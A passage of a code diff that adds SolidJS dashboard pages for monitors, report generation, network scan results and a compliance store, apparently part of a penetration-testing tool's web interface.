+        <Show when={selectedMonitor()}>
+          <div class="card w-[450px] flex-shrink-0 overflow-auto max-h-[calc(100vh-200px)]">
+            <div class="flex items-center justify-between mb-4 sticky top-0 bg-gray-800 pb-4">
+              <h3 class="text-lg font-semibold text-gray-100">Monitor Details</h3>
+              <button
+                onClick={() => {
+                  setSelectedMonitor(null)
+                  setRuns([])
+                }}
+                class="text-gray-400 hover:text-gray-100"
+              >
+                <svg class="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M6 18L18 6M6 6l12 12" />
+                </svg>
+              </button>
+            </div>
+
+            <div class="space-y-4">
+              <div>
+                <div class="text-sm text-gray-400">Name</div>
+                <div class="text-gray-100 font-medium">{selectedMonitor()!.name}</div>
+              </div>
+
+              <Show when={selectedMonitor()!.description}>
+                <div>
+                  <div class="text-sm text-gray-400">Description</div>
+                  <div class="text-gray-300 text-sm">{selectedMonitor()!.description}</div>
+                </div>
+              </Show>
+
+              <div class="grid grid-cols-2 gap-4">
+                <div>
+                  <div class="text-sm text-gray-400">Status</div>
+                  <StatusBadge status={selectedMonitor()!.status} />
+                </div>
+                <div>
+                  <div class="text-sm text-gray-400">Schedule</div>
+                  <div class="text-gray-300">{formatSchedule(selectedMonitor()!)}</div>
+                </div>
+              </div>
+
+              <div>
+                <div class="text-sm text-gray-400">Targets</div>
+                <div class="flex flex-wrap gap-1 mt-1">
+                  <For each={selectedMonitor()!.targets}>
+                    {(target) => (
+                      <span class="badge bg-gray-700 text-gray-300">{target}</span>
+                    )}
+                  </For>
+                </div>
+              </div>
+
+              <div>
+                <div class="text-sm text-gray-400">Tools</div>
+                <div class="flex flex-wrap gap-1 mt-1">
+                  <For each={selectedMonitor()!.tools.filter((t) => t.enabled)}>
+                    {(tool) => (
+                      <span class="badge bg-blue-900 text-blue-200">{tool.tool}</span>
+                    )}
+                  </For>
+                </div>
+              </div>
+
+              <div class="grid grid-cols-2 gap-4">
+                <div>
+                  <div class="text-sm text-gray-400">Total Runs</div>
+                  <div class="text-gray-100 font-medium">{selectedMonitor()!.runCount}</div>
+                </div>
+                <div>
+                  <div class="text-sm text-gray-400">Next Run</div>
+                  <div class="text-gray-300 text-sm">
+                    {selectedMonitor()!.nextRunAt
+                      ? new Date(selectedMonitor()!.nextRunAt!).toLocaleString()
+                      : "Not scheduled"}
+                  </div>
+                </div>
+              </div>
+
+              {/* Alerts config */}
+              <div>
+                <div class="text-sm text-gray-400">Alerts</div>
+                <div class="text-gray-300 text-sm">
+                  {selectedMonitor()!.alerts.enabled ? (
+                    <>
+                      Enabled - Min severity: {selectedMonitor()!.alerts.minSeverity}
+                      {selectedMonitor()!.alerts.newFindingsOnly && " (new only)"}
+                    </>
+                  ) : (
+                    "Disabled"
+                  )}
+                </div>
+              </div>
+
+              {/* Run history */}
+              <div class="pt-4 border-t border-gray-700">
+                <div class="text-sm text-gray-400 mb-2">Recent Runs</div>
+                <Show when={runs().length > 0} fallback={<div class="text-gray-500 text-sm">No runs yet</div>}>
+                  <div class="space-y-2 max-h-64 overflow-y-auto">
+                    <For each={runs()}>
+                      {(run) => (
+                        <div class="bg-gray-900 p-2 rounded text-sm flex items-center justify-between">
+                          <div class="flex items-center gap-2">
+                            <span class="text-gray-400">#{run.runNumber}</span>
+                            <StatusBadge status={run.status} size="sm" />
+                          </div>
+                          <div class="flex items-center gap-3 text-gray-400">
+                            <span>{run.findingIDs.length} findings</span>
+                            <Show when={run.newFindingIDs.length > 0}>
+                              <span class="text-green-400">+{run.newFindingIDs.length}</span>
+                            </Show>
+                            <span>{new Date(run.startTime).toLocaleDateString()}</span>
+                          </div>
+                        </div>
+                      )}
+                    </For>
+                  </div>
+                </Show>
+              </div>
+
+              {/* Actions */}
+              <div class="pt-4 border-t border-gray-700">
+                <button
+                  onClick={() => triggerRun(selectedMonitor()!.id)}
+                  disabled={
+                    triggering() === selectedMonitor()!.id ||
+                    runningMonitors().includes(selectedMonitor()!.id) ||
+                    selectedMonitor()!.status !== "active"
+                  }
+                  class="btn btn-primary w-full disabled:opacity-50"
+                >
+                  {triggering() === selectedMonitor()!.id || runningMonitors().includes(selectedMonitor()!.id)
+                    ? "Running..."
+                    : "Run Now"}
+                </button>
+              </div>
+
+              <div class="text-xs text-gray-500 pt-2">
+                Created: {new Date(selectedMonitor()!.createdAt).toLocaleString()}
+              </div>
+            </div>
+          </div>
+        </Show>
+      </div>
+    </div>
+  )
+}
+
+export default Monitors
diff --git a/packages/opencode/src/dashboard/src/pages/Reports.tsx b/packages/opencode/src/dashboard/src/pages/Reports.tsx
new file mode 100644
index 00000000000..300dde2a666
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/pages/Reports.tsx
@@ -0,0 +1,493 @@
+import { Component, createSignal, Show, For } from "solid-js"
+import { reportsApi, complianceApi, type Report, type ReportRequest, type ComplianceFramework } from "../api/client"
+
+const Reports: Component = () => {
+  const [reportType, setReportType] = createSignal<"executive" | "technical" | "compliance">("executive")
+  const [complianceFramework, setComplianceFramework] = createSignal<"pci-dss" | "hipaa" | "soc2">("pci-dss")
+  const [frameworks, setFrameworks] = createSignal<ComplianceFramework[]>([])
+  const [severityFilters, setSeverityFilters] = createSignal<string[]>([])
+  const [statusFilters, setStatusFilters] = createSignal<string[]>([])
+  const [generating, setGenerating] = createSignal(false)
+  const [report, setReport] = createSignal<Report | null>(null)
+  const [error, setError] = createSignal<string | null>(null)
+
+  // Fetch frameworks on mount
+  complianceApi.listFrameworks().then((result) => {
+    if (result.data) {
+      setFrameworks(result.data.frameworks)
+    }
+  })
+
+  const toggleSeverity = (severity: string) => {
+    setSeverityFilters((prev) =>
+      prev.includes(severity) ? prev.filter((s) => s !== severity) : [...prev, severity]
+    )
+  }
+
+  const toggleStatus = (status: string) => {
+    setStatusFilters((prev) =>
+      prev.includes(status) ? prev.filter((s) => s !== status) : [...prev, status]
+    )
+  }
+
+  const generateReport = async () => {
+    setGenerating(true)
+    setError(null)
+    setReport(null)
+
+    const request: ReportRequest = {
+      type: reportType(),
+      filters: {
+        severity: severityFilters().length > 0 ? severityFilters() : undefined,
+        status: statusFilters().length > 0 ? statusFilters() : undefined,
+      },
+    }
+
+    if (reportType() === "compliance") {
+      request.framework = complianceFramework()
+    }
+
+    const result = await reportsApi.generate(request)
+
+    if (result.error) {
+      setError(result.error)
+    } else if (result.data) {
+      setReport(result.data.report)
+    }
+
+    setGenerating(false)
+  }
+
+  const downloadReport = () => {
+    if (!report()) return
+
+    const blob = new Blob([JSON.stringify(report(), null, 2)], { type: "application/json" })
+    const url = URL.createObjectURL(blob)
+    const a = document.createElement("a")
+    a.href = url
+    a.download = `${reportType()}-report-${Date.now()}.json`
+    a.click()
+    URL.revokeObjectURL(url)
+  }
+
+  const getExecutiveReport = () => {
+    if (!report() || report()!.type !== "executive") return null
+    return report() as any
+  }
+
+  const getTechnicalReport = () => {
+    if (!report() || report()!.type !== "technical") return null
+    return report() as any
+  }
+
+  const getComplianceReport = () => {
+    if (!report() || report()!.type !== "compliance") return null
+    return report() as any
+  }
+
+  return (
+    <div class="space-y-6">
+      {/* Header */}
+      <div class="flex items-center justify-between">
+        <div>
+          <h1 class="text-2xl font-bold text-gray-100">Reports</h1>
+          <p class="text-gray-400 mt-1">Generate security assessment reports</p>
+        </div>
+      </div>
+
+      <Show when={error()}>
+        <div class="bg-red-900/50 border border-red-700 rounded-lg p-4 text-red-200">
+          {error()}
+        </div>
+      </Show>
+
+      <div class="grid grid-cols-1 lg:grid-cols-3 gap-6">
+        {/* Report configuration */}
+        <div class="card">
+          <div class="card-header">Report Configuration</div>
+
+          {/* Report type */}
+          <div class="space-y-4">
+            <div>
+              <label class="block text-sm text-gray-400 mb-2">Report Type</label>
+              <div class="space-y-2">
+                <label class="flex items-center gap-3 cursor-pointer">
+                  <input
+                    type="radio"
+                    name="reportType"
+                    value="executive"
+                    checked={reportType() === "executive"}
+                    onChange={() => setReportType("executive")}
+                    class="form-radio text-blue-500"
+                  />
+                  <div>
+                    <div class="text-gray-100">Executive Summary</div>
+                    <div class="text-xs text-gray-500">High-level overview for stakeholders</div>
+                  </div>
+                </label>
+                <label class="flex items-center gap-3 cursor-pointer">
+                  <input
+                    type="radio"
+                    name="reportType"
+                    value="technical"
+                    checked={reportType() === "technical"}
+                    onChange={() => setReportType("technical")}
+                    class="form-radio text-blue-500"
+                  />
+                  <div>
+                    <div class="text-gray-100">Technical Report</div>
+                    <div class="text-xs text-gray-500">Detailed findings by target</div>
+                  </div>
+                </label>
+                <label class="flex items-center gap-3 cursor-pointer">
+                  <input
+                    type="radio"
+                    name="reportType"
+                    value="compliance"
+                    checked={reportType() === "compliance"}
+                    onChange={() => setReportType("compliance")}
+                    class="form-radio text-blue-500"
+                  />
+                  <div>
+                    <div class="text-gray-100">Compliance Report</div>
+                    <div class="text-xs text-gray-500">Framework-specific assessment</div>
+                  </div>
+                </label>
+              </div>
+            </div>
+
+            {/* Compliance framework selection */}
+            <Show when={reportType() === "compliance"}>
+              <div>
+                <label class="block text-sm text-gray-400 mb-2">Compliance Framework</label>
+                <select
+                  class="select w-full"
+                  value={complianceFramework()}
+                  onChange={(e) => setComplianceFramework(e.currentTarget.value as any)}
+                >
+                  <For each={frameworks()}>
+                    {(f) => (
+                      <option value={f.id}>
+                        {f.name} v{f.version}
+                      </option>
+                    )}
+                  </For>
+                </select>
+              </div>
+            </Show>
+
+            {/* Severity filter */}
+            <div>
+              <label class="block text-sm text-gray-400 mb-2">Severity Filter</label>
+              <div class="flex flex-wrap gap-2">
+                <For each={["critical", "high", "medium", "low", "info"]}>
+                  {(severity) => (
+                    <button
+                      onClick={() => toggleSeverity(severity)}
+                      class={`badge cursor-pointer ${
+                        severityFilters().includes(severity)
+                          ? severity === "critical"
+                            ? "bg-red-700 text-red-100"
+                            : severity === "high"
+                            ? "bg-orange-700 text-orange-100"
+                            : severity === "medium"
+                            ? "bg-yellow-700 text-yellow-100"
+                            : severity === "low"
+                            ? "bg-blue-700 text-blue-100"
+                            : "bg-gray-600 text-gray-200"
+                          : "bg-gray-700 text-gray-400"
+                      }`}
+                    >
+                      {severity}
+                    </button>
+                  )}
+                </For>
+              </div>
+              <div class="text-xs text-gray-500 mt-1">
+                {severityFilters().length === 0 ? "All severities" : `${severityFilters().length} selected`}
+              </div>
+            </div>
+
+            {/* Status filter */}
+            <div>
+              <label class="block text-sm text-gray-400 mb-2">Status Filter</label>
+              <div class="flex flex-wrap gap-2">
+                <For each={["open", "confirmed", "mitigated", "false_positive"]}>
+                  {(status) => (
+                    <button
+                      onClick={() => toggleStatus(status)}
+                      class={`badge cursor-pointer ${
+                        statusFilters().includes(status) ? "bg-blue-700 text-blue-100" : "bg-gray-700 text-gray-400"
+                      }`}
+                    >
+                      {status.replace("_", " ")}
+                    </button>
+                  )}
+                </For>
+              </div>
+              <div class="text-xs text-gray-500 mt-1">
+                {statusFilters().length === 0 ? "All statuses" : `${statusFilters().length} selected`}
+              </div>
+            </div>
+
+            {/* Generate button */}
+            <button
+              onClick={generateReport}
+              disabled={generating()}
+              class="btn btn-primary w-full disabled:opacity-50"
+            >
+              {generating() ? (
+                <span class="flex items-center justify-center gap-2">
+                  <div class="animate-spin rounded-full h-4 w-4 border-b-2 border-white"></div>
+                  Generating...
+                </span>
+              ) : (
+                "Generate Report"
+              )}
+            </button>
+          </div>
+        </div>
+
+        {/* Report preview */}
+        <div class="lg:col-span-2 card">
+          <div class="flex items-center justify-between mb-4">
+            <div class="card-header mb-0">Report Preview</div>
+            <Show when={report()}>
+              <button onClick={downloadReport} class="btn btn-secondary text-sm">
+                Download JSON
+              </button>
+            </Show>
+          </div>
+
+          <Show when={!report()}>
+            <div class="text-center py-16 text-gray-400">
+              <svg class="w-16 h-16 mx-auto mb-4 text-gray-600" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                <path
+                  stroke-linecap="round"
+                  stroke-linejoin="round"
+                  stroke-width="2"
+                  d="M9 17v-2m3 2v-4m3 4v-6m2 10H7a2 2 0 01-2-2V5a2 2 0 012-2h5.586a1 1 0 01.707.293l5.414 5.414a1 1 0 01.293.707V19a2 2 0 01-2 2z"
+                />
+              </svg>
+              <p>Configure and generate a report to see the preview.</p>
+            </div>
+          </Show>
+
+          {/* Executive report preview */}
+          <Show when={getExecutiveReport()}>
+            <div class="space-y-6">
+              {/* Risk score */}
+              <div class="bg-gray-900 rounded-lg p-6 text-center">
+                <div
+                  class={`text-5xl font-bold ${
+                    getExecutiveReport()!.summary.riskLevel === "critical"
+                      ? "text-red-400"
+                      : getExecutiveReport()!.summary.riskLevel === "high"
+                      ? "text-orange-400"
+                      : getExecutiveReport()!.summary.riskLevel === "medium"
+                      ? "text-yellow-400"
+                      : "text-green-400"
+                  }`}
+                >
+                  {getExecutiveReport()!.summary.riskScore}
+                </div>
+                <div class="text-gray-400 mt-2">
+                  Risk Score ({getExecutiveReport()!.summary.riskLevel} risk)
+                </div>
+              </div>
+
+              {/* Summary stats */}
+              <div class="grid grid-cols-2 md:grid-cols-4 gap-4">
+                <div class="bg-gray-900 p-4 rounded-lg text-center">
+                  <div class="text-2xl font-bold text-gray-100">
+                    {getExecutiveReport()!.summary.totalFindings}
+                  </div>
+                  <div class="text-sm text-gray-400">Total Findings</div>
+                </div>
+                <div class="bg-gray-900 p-4 rounded-lg text-center">
+                  <div class="text-2xl font-bold text-red-400">
+                    {getExecutiveReport()!.summary.bySeverity.critical || 0}
+                  </div>
+                  <div class="text-sm text-gray-400">Critical</div>
+                </div>
+                <div class="bg-gray-900 p-4 rounded-lg text-center">
+                  <div class="text-2xl font-bold text-yellow-400">
+                    {getExecutiveReport()!.summary.openIssues}
+                  </div>
+                  <div class="text-sm text-gray-400">Open Issues</div>
+                </div>
+                <div class="bg-gray-900 p-4 rounded-lg text-center">
+                  <div class="text-2xl font-bold text-green-400">
+                    {getExecutiveReport()!.summary.resolvedIssues}
+                  </div>
+                  <div class="text-sm text-gray-400">Resolved</div>
+                </div>
+              </div>
+
+              {/* Critical findings */}
+              <Show when={getExecutiveReport()!.highlights.criticalFindings.length > 0}>
+                <div>
+                  <div class="text-sm text-gray-400 mb-2">Critical Findings Requiring Attention</div>
+                  <div class="space-y-2">
+                    <For each={getExecutiveReport()!.highlights.criticalFindings}>
+                      {(finding: any) => (
+                        <div class="bg-red-900/20 border border-red-800 rounded-lg p-3">
+                          <div class="font-medium text-red-200">{finding.title}</div>
+                          <div class="text-sm text-red-300/70">{finding.target}</div>
+                        </div>
+                      )}
+                    </For>
+                  </div>
+                </div>
+              </Show>
+
+              {/* Recommendations */}
+              <div>
+                <div class="text-sm text-gray-400 mb-2">Recommendations</div>
+                <ul class="space-y-2">
+                  <For each={getExecutiveReport()!.recommendations}>
+                    {(rec: string) => (
+                      <li class="flex items-start gap-2 text-gray-300">
+                        <svg class="w-5 h-5 text-blue-400 flex-shrink-0 mt-0.5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                          <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M9 12l2 2 4-4m6 2a9 9 0 11-18 0 9 9 0 0118 0z" />
+                        </svg>
+                        {rec}
+                      </li>
+                    )}
+                  </For>
+                </ul>
+              </div>
+            </div>
+          </Show>
+
+          {/* Technical report preview */}
+          <Show when={getTechnicalReport()}>
+            <div class="space-y-4">
+              <div class="text-lg font-medium text-gray-100">
+                {getTechnicalReport()!.totalFindings} Findings across {getTechnicalReport()!.targets?.length || 0} Targets
+              </div>
+
+              <div class="space-y-4 max-h-[500px] overflow-y-auto">
+                <For each={getTechnicalReport()!.targets}>
+                  {(target: any) => (
+                    <div class="bg-gray-900 rounded-lg p-4">
+                      <div class="flex items-center justify-between mb-3">
+                        <div class="font-medium text-gray-100">{target.target}</div>
+                        <div class="text-sm text-gray-400">{target.findings.length} findings</div>
+                      </div>
+                      <div class="grid grid-cols-5 gap-2 text-center text-sm">
+                        <div>
+                          <div class="text-red-400 font-bold">{target.summary.critical}</div>
+                          <div class="text-gray-500 text-xs">Critical</div>
+                        </div>
+                        <div>
+                          <div class="text-orange-400 font-bold">{target.summary.high}</div>
+                          <div class="text-gray-500 text-xs">High</div>
+                        </div>
+                        <div>
+                          <div class="text-yellow-400 font-bold">{target.summary.medium}</div>
+                          <div class="text-gray-500 text-xs">Medium</div>
+                        </div>
+                        <div>
+                          <div class="text-blue-400 font-bold">{target.summary.low}</div>
+                          <div class="text-gray-500 text-xs">Low</div>
+                        </div>
+                        <div>
+                          <div class="text-gray-400 font-bold">{target.summary.info}</div>
+                          <div class="text-gray-500 text-xs">Info</div>
+                        </div>
+                      </div>
+                    </div>
+                  )}
+                </For>
+              </div>
+            </div>
+          </Show>
+
+          {/* Compliance report preview */}
+          <Show when={getComplianceReport()}>
+            <div class="space-y-4">
+              <div class="bg-gray-900 rounded-lg p-6 text-center">
+                <div
+                  class={`text-5xl font-bold ${
+                    getComplianceReport()!.summary.compliancePercentage >= 80
+                      ? "text-green-400"
+                      : getComplianceReport()!.summary.compliancePercentage >= 50
+                      ? "text-yellow-400"
+                      : "text-red-400"
+                  }`}
+                >
+                  {getComplianceReport()!.summary.compliancePercentage}%
+                </div>
+                <div class="text-gray-400 mt-2">
+                  {getComplianceReport()!.framework.toUpperCase()} Compliance Score
+                </div>
+              </div>
+
+              <div class="grid grid-cols-4 gap-4 text-center">
+                <div class="bg-gray-900 p-3 rounded-lg">
+                  <div class="text-lg font-bold text-gray-100">
+                    {getComplianceReport()!.summary.totalControls}
+                  </div>
+                  <div class="text-xs text-gray-400">Total Controls</div>
+                </div>
+                <div class="bg-gray-900 p-3 rounded-lg">
+                  <div class="text-lg font-bold text-green-400">
+                    {getComplianceReport()!.summary.passedControls}
+                  </div>
+                  <div class="text-xs text-gray-400">Passed</div>
+                </div>
+                <div class="bg-gray-900 p-3 rounded-lg">
+                  <div class="text-lg font-bold text-red-400">
+                    {getComplianceReport()!.summary.failedControls}
+                  </div>
+                  <div class="text-xs text-gray-400">Failed</div>
+                </div>
+                <div class="bg-gray-900 p-3 rounded-lg">
+                  <div class="text-lg font-bold text-gray-400">
+                    {getComplianceReport()!.summary.notAssessed}
+                  </div>
+                  <div class="text-xs text-gray-400">Not Assessed</div>
+                </div>
+              </div>
+
+              <Show when={getComplianceReport()!.gaps?.length > 0}>
+                <div>
+                  <div class="text-sm text-gray-400 mb-2">Compliance Gaps</div>
+                  <div class="space-y-2 max-h-64 overflow-y-auto">
+                    <For each={getComplianceReport()!.gaps.slice(0, 10)}>
+                      {(gap: any) => (
+                        <div class="bg-gray-900 p-3 rounded-lg">
+                          <div class="flex items-center justify-between">
+                            <div class="font-medium text-gray-200">
+                              {gap.control.id} - {gap.control.name}
+                            </div>
+                            <span
+                              class={`badge ${
+                                gap.status === "fail" ? "bg-red-900 text-red-200" : "bg-yellow-900 text-yellow-200"
+                              }`}
+                            >
+                              {gap.status}
+                            </span>
+                          </div>
+                        </div>
+                      )}
+                    </For>
+                  </div>
+                </div>
+              </Show>
+            </div>
+          </Show>
+
+          <Show when={report()}>
+            <div class="text-xs text-gray-500 mt-4 text-right">
+              Generated: {new Date(report()!.generatedAt).toLocaleString()}
+            </div>
+          </Show>
+        </div>
+      </div>
+    </div>
+  )
+}
+
+export default Reports
diff --git a/packages/opencode/src/dashboard/src/pages/Scans.tsx b/packages/opencode/src/dashboard/src/pages/Scans.tsx
new file mode 100644
index 00000000000..9da9c3f5098
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/pages/Scans.tsx
@@ -0,0 +1,310 @@
+import { Component, createSignal, createEffect, Show, For, onCleanup } from "solid-js"
+import { useParams } from "@solidjs/router"
+import { scansApi, type ScanResult } from "../api/client"
+import { DataTable, type Column } from "../components/shared/DataTable"
+import { sseClient } from "../api/sse"
+
+const Scans: Component = () => {
+  const params = useParams()
+
+  const [scans, setScans] = createSignal<ScanResult[]>([])
+  const [activeScans, setActiveScans] = createSignal<string[]>([])
+  const [selectedScan, setSelectedScan] = createSignal<ScanResult | null>(null)
+  const [loading, setLoading] = createSignal(true)
+  const [error, setError] = createSignal<string | null>(null)
+
+  const fetchScans = async () => {
+    setLoading(true)
+    setError(null)
+
+    const result = await scansApi.list({ limit: 100 })
+
+    if (result.error) {
+      setError(result.error)
+    } else if (result.data) {
+      setScans(result.data.scans)
+    }
+
+    setLoading(false)
+  }
+
+  const fetchScanDetail = async (id: string) => {
+    const result = await scansApi.get(id)
+    if (result.data) {
+      setSelectedScan(result.data.scan)
+    }
+  }
+
+  createEffect(() => {
+    if (params.id) {
+      fetchScanDetail(params.id)
+    } else {
+      setSelectedScan(null)
+    }
+  })
+
+  createEffect(() => {
+    fetchScans()
+  })
+
+  // Real-time updates
+  onCleanup(
+    sseClient.on("pentest.scan_started", (event) => {
+      const scanID = event.properties.scanID as string
+      if (scanID) {
+        setActiveScans((prev) => [...prev, scanID])
+      }
+    })
+  )
+
+  onCleanup(
+    sseClient.on("pentest.scan_completed", (event) => {
+      const scan = event.properties.scan as ScanResult
+      if (scan) {
+        setActiveScans((prev) => prev.filter((id) => id !== scan.id))
+        setScans((prev) => [scan, ...prev.filter((s) => s.id !== scan.id)])
+        if (selectedScan()?.id === scan.id) {
+          setSelectedScan(scan)
+        }
+      }
+    })
+  )
+
+  const formatDuration = (scan: ScanResult) => {
+    if (!scan.endTime) return "Running..."
+    const duration = scan.endTime - scan.startTime
+    const seconds = Math.floor(duration / 1000)
+    if (seconds < 60) return `${seconds}s`
+    const minutes = Math.floor(seconds / 60)
+    return `${minutes}m ${seconds % 60}s`
+  }
+
+  const getScanTypeLabel = (type: string) => {
+    const labels: Record<string, string> = {
+      port: "Port Scan",
+      service: "Service Detection",
+      vuln: "Vulnerability Scan",
+      web: "Web Scan",
+      custom: "Custom Scan",
+    }
+    return labels[type] || type
+  }
+
+  const columns: Column<ScanResult>[] = [
+    {
+      key: "scanType",
+      header: "Type",
+      width: "120px",
+      render: (s) => (
+        <span class="badge bg-blue-900 text-blue-200">
+          {getScanTypeLabel(s.scanType)}
+        </span>
+      ),
+    },
+    {
+      key: "target",
+      header: "Target",
+      render: (s) => (
+        <div>
+          <div class="font-medium text-gray-100">{s.target}</div>
+          <div class="text-xs text-gray-500 mt-1 truncate max-w-xs" title={s.command}>
+            {s.command}
+          </div>
+        </div>
+      ),
+    },
+    {
+      key: "hosts",
+      header: "Hosts",
+      width: "80px",
+      render: (s) => (
+        <span class="text-gray-300">{s.hosts.length}</span>
+      ),
+    },
+    {
+      key: "status",
+      header: "Status",
+      width: "100px",
+      render: (s) => (
+        <Show
+          when={s.endTime}
+          fallback={
+            <span class="badge bg-blue-900 text-blue-200 animate-pulse">Running</span>
+          }
+        >
+          <span class="badge bg-green-900 text-green-200">Completed</span>
+        </Show>
+      ),
+    },
+    {
+      key: "duration",
+      header: "Duration",
+      width: "100px",
+      render: (s) => (
+        <span class="text-gray-400 text-sm">{formatDuration(s)}</span>
+      ),
+    },
+    {
+      key: "startTime",
+      header: "Started",
+      width: "120px",
+      render: (s) => (
+        <span class="text-gray-400 text-sm">
+          {new Date(s.startTime).toLocaleString()}
+        </span>
+      ),
+    },
+  ]
+
+  return (
+    <div class="space-y-6">
+      {/* Header */}
+      <div class="flex items-center justify-between">
+        <div>
+          <h1 class="text-2xl font-bold text-gray-100">Scans</h1>
+          <p class="text-gray-400 mt-1">Network and vulnerability scan results</p>
+        </div>
+        <div class="flex items-center gap-4">
+          <Show when={activeScans().length > 0}>
+            <span class="badge bg-blue-900 text-blue-200 animate-pulse">
+              {activeScans().length} active scan{activeScans().length > 1 ? "s" : ""}
+            </span>
+          </Show>
+          <span class="text-sm text-gray-400">{scans().length} scans</span>
+        </div>
+      </div>
+
+      <Show when={error()}>
+        <div class="bg-red-900/50 border border-red-700 rounded-lg p-4 text-red-200">
+          {error()}
+        </div>
+      </Show>
+
+      {/* Main content */}
+      <div class="flex gap-6">
+        {/* Scans list */}
+        <div class={`card flex-1 ${selectedScan() ? "max-w-3xl" : ""}`}>
+          <DataTable
+            columns={columns}
+            data={scans()}
+            loading={loading()}
+            emptyMessage="No scans found"
+            onRowClick={(s) => setSelectedScan(s)}
+          />
+        </div>
+
+        {/* Detail panel */}
+        <Show when={selectedScan()}>
+          <div class="card w-[450px] flex-shrink-0 overflow-auto max-h-[calc(100vh-200px)]">
+            <div class="flex items-center justify-between mb-4 sticky top-0 bg-gray-800 pb-4">
+              <h3 class="text-lg font-semibold text-gray-100">Scan Details</h3>
+              <button
+                onClick={() => setSelectedScan(null)}
+                class="text-gray-400 hover:text-gray-100"
+              >
+                <svg class="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
+                  <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M6 18L18 6M6 6l12 12" />
+                </svg>
+              </button>
+            </div>
+
+            <div class="space-y-4">
+              <div class="grid grid-cols-2 gap-4">
+                <div>
+                  <div class="text-sm text-gray-400">Type</div>
+                  <div class="text-gray-100">{getScanTypeLabel(selectedScan()!.scanType)}</div>
+                </div>
+                <div>
+                  <div class="text-sm text-gray-400">Duration</div>
+                  <div class="text-gray-100">{formatDuration(selectedScan()!)}</div>
+                </div>
+              </div>
+
+              <div>
+                <div class="text-sm text-gray-400">Target</div>
+                <div class="text-gray-100">{selectedScan()!.target}</div>
+              </div>
+
+              <div>
+                <div class="text-sm text-gray-400">Command</div>
+                <div class="text-gray-300 text-sm bg-gray-900 p-2 rounded font-mono overflow-x-auto">
+                  {selectedScan()!.command}
+                </div>
+              </div>
+
+              <Show when={selectedScan()!.summary}>
+                <div>
+                  <div class="text-sm text-gray-400">Summary</div>
+                  <div class="text-gray-300 text-sm">{selectedScan()!.summary}</div>
+                </div>
+              </Show>
+
+              {/* Hosts */}
+              <div>
+                <div class="text-sm text-gray-400 mb-2">
+                  Discovered Hosts ({selectedScan()!.hosts.length})
+                </div>
+                <div class="space-y-3 max-h-96 overflow-y-auto">
+                  <For each={selectedScan()!.hosts}>
+                    {(host) => (
+                      <div class="bg-gray-900 p-3 rounded-lg">
+                        <div class="flex items-center justify-between mb-2">
+                          <div class="font-medium text-gray-100">
+                            {host.address}
+                            {host.hostname && (
+                              <span class="text-gray-400 ml-2">({host.hostname})</span>
+                            )}
+                          </div>
+                          <span
+                            class={`badge ${
+                              host.status === "up" ? "bg-green-900 text-green-200" : "bg-gray-700 text-gray-400"
+                            }`}
+                          >
+                            {host.status}
+                          </span>
+                        </div>
+
+                        <Show when={host.ports.length > 0}>
+                          <div class="text-xs text-gray-400 mb-1">
+                            {host.ports.filter((p) => p.state === "open").length} open ports
+                          </div>
+                          <div class="grid grid-cols-2 gap-1">
+                            <For each={host.ports.filter((p) => p.state === "open").slice(0, 10)}>
+                              {(port) => (
+                                <div class="text-sm text-gray-300">
+                                  <span class="text-blue-400">{port.portid}</span>
+                                  <span class="text-gray-500">/{port.protocol}</span>
+                                  {port.service?.name && (
+                                    <span class="text-gray-400 ml-1">{port.service.name}</span>
+                                  )}
+                                </div>
+                              )}
+                            </For>
+                            <Show when={host.ports.filter((p) => p.state === "open").length > 10}>
+                              <div class="text-sm text-gray-500">
+                                +{host.ports.filter((p) => p.state === "open").length - 10} more
+                              </div>
+                            </Show>
+                          </div>
+                        </Show>
+                      </div>
+                    )}
+                  </For>
+                </div>
+              </div>
+
+              <div class="text-xs text-gray-500 pt-2 border-t border-gray-700">
+                Started: {new Date(selectedScan()!.startTime).toLocaleString()}
+                {selectedScan()!.endTime && (
+                  <> | Ended: {new Date(selectedScan()!.endTime).toLocaleString()}</>
+                )}
+              </div>
+            </div>
+          </div>
+        </Show>
+      </div>
+    </div>
+  )
+}
+
+export default Scans
diff --git a/packages/opencode/src/dashboard/src/stores/compliance.ts b/packages/opencode/src/dashboard/src/stores/compliance.ts
new file mode 100644
index 00000000000..fabcf399a98
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/stores/compliance.ts
@@ -0,0 +1,166 @@
+/**
+ * Compliance Store
+ *
+ * Reactive state management for compliance frameworks and assessments.
+ */
+
+import { createSignal, createEffect } from "solid-js"
+import { createStore } from "solid-js/store"
+import {
+  complianceApi,
+  type ComplianceFramework,
+  type ComplianceControl,
+  type ComplianceAssessment,
+} from "../api/client"
+
+export interface ComplianceState {
+  frameworks: ComplianceFramework[]
+  selectedFramework: string | null
+  controls: ComplianceControl[]
+  categories: Array<{ id: string; name: string; description?: string }>
+  assessment: ComplianceAssessment | null
+  loading: boolean
+  assessing: boolean
+  error: string | null
+}
+
+const [state, setState] = createStore<ComplianceState>({
+  frameworks: [],
+  selectedFramework: null,
+  controls: [],
+  categories: [],
+  assessment: null,
+  loading: false,
+  assessing: false,
+  error: null,
+})
+
+export const complianceStore = {
+  get state() {
+    return state
+  },
+
+  async fetchFrameworks() {
+    setState("loading", true)
+    setState("error", null)
+
+    const result = await complianceApi.listFrameworks()
+
+    if (result.error) {
+      setState("error", result.error)
+      setState("loading", false)
+      return
+    }
+
+    if (result.data) {
+      setState("frameworks", result.data.frameworks)
+    }
+
+    setState("loading", false)
+  },
+
+  async selectFramework(frameworkId: string) {
+    setState("loading", true)
+    setState("error", null)
+    setState("selectedFramework", frameworkId)
+
+    const result = await complianceApi.getFramework(frameworkId)
+
+    if (result.error) {
+      setState("error", result.error)
+      setState("loading", false)
+      return
+    }
+
+    if (result.data) {
+      setState("controls", result.data.controls)
+      setState("categories", result.data.categories)
+    }
+
+    setState("loading", false)
+  },
+
+  async runAssessment(frameworkId?: string) {
+    const framework = frameworkId || state.selectedFramework
+    if (!framework) {
+      setState("error", "No framework selected")
+      return null
+    }
+
+    setState("assessing", true)
+    setState("error", null)
+
